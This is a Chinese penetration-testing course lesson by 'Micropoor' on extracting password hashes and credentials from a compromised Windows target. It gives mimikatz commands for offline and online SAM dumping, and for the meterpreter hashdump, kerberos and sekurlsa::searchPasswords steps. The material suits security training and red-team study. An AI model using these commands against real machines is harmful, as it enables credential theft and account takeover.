# 第六十五课：离线提取目标机hash补充

上一季下载sys.hiv,sam.hiv,security.hiv文件后，以Linux下为背景来离线提取hash，本季补充以windows为背景离线提取hash。

mimikatz 2.0 二进制文件下载地址：\
<https://github.com/gentilkiwi/mimikatz/releases/latest>\
切到当下目录（注意X86,X64位）

mimikatz离线导hash命令：

```bash
mimikatz.exe "lsadump::sam /system:sys.hiv /sam:sam.hiv" exit
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZP8bqs_B9W6XM38oPm%2F92ae7706ceec3aa04bce07e08ced2e16.jpg?generation=1551066049446817\&alt=media)

mimikatz在线导hash命令：

```bash
mimikatz.exe "log Micropoor.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZP8bqw9frhRzRX5_CA%2F88ab6bceca9f6a733b768b1ccfefe688.jpg?generation=1551066056984409\&alt=media)

当然关于提取目标机的hash，msf也内置了离线提取与在线提取hash。

meterpreter下hashdump命令来提取hash（注意当前权限）\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZP8br0fyDbR4wzKSAZ%2F79e0ae6ee3518126f0c11872201c70fb.jpg?generation=1551066081898078\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZP8br3vCFfBTm_fZ8U%2F5808e7c6ac005d96f8289f994db6e45e.jpg?generation=1551066077636111\&alt=media)

msf同时也内置了mimikatz，meterpreter执行load mimikatz即可加载该插件。**（这里一定要注意，msf默认调用于payload位数相同的mimikatz）**

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZP8br6RmxiRkrbgt__%2F3535a826c17c149f290fd79bd2fe865a.jpg?generation=1551066098786902\&alt=media)

直接执行kerberos即可。

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZP8br9qHgLw_1xcwiG%2F0134f11ff22c5d4450f173c8e5ce9717.jpg?generation=1551066050698860\&alt=media)

当然有些情况下，payload位数无误，权限无误，依然无法提取目标机的密码相关。需要调用mimikatz自定义命令：

```bash
mimikatz_command -f sekurlsa::searchPasswords
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZP8brCO7Pqj8pg5dFi%2Fae5d3f87f6df54f4a42bfa231e5847c0.jpg?generation=1551066088697411\&alt=media)

> Micropoor